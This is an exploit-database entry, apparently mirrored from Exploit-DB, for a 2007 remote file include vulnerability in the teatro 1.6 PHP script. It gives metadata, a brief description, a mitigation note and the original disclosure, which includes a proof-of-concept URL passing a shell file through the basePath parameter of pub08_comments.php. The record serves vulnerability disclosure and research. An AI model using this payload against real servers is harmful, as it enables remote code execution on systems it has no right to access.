header-logo
Suggest Exploit
vendor:
teatro
by:
Alkomandoz Hacker
5.5
CVSS
MEDIUM
Remote File Include
98
CWE
Product Name: teatro
Affected Version From: teatro 1.6
Affected Version To: teatro 1.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

teatro 1.6 Remote File Include Vulnerability

This vulnerability allows an attacker to include a remote file in the teatro 1.6 script. The vulnerable file is pub08_comments.php and the parameter basePath is not properly validated, allowing an attacker to specify a remote file to include.

Mitigation:

To mitigate this vulnerability, ensure that all user inputs are properly validated and sanitized before being used in file includes.
Source

Exploit-DB raw data:

# teatro 1.6 Remote File Include Vulnerability
 Download script : http://telemat.die.unifi.it/book/2003/Telematica-II/teatro-1.6.tgz
 Dicovered by    : Alkomandoz Hacker
 Contact         : alkomandoz-hacker@hotmail.com
=========================================================================

 
http://localhost/path/teatro/pub/pub08_comments.php?basePath=shell.txt
======================================================================

# Thanx:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team
# Greetz To:   Sniper_Sa & Pal-Hackers & Hack eGy & Dr SeSo & No4Hard & Devil-x & Gold_M

# milw0rm.com [2007-10-28]

Navigation

Suggest Exploit

Services By CQR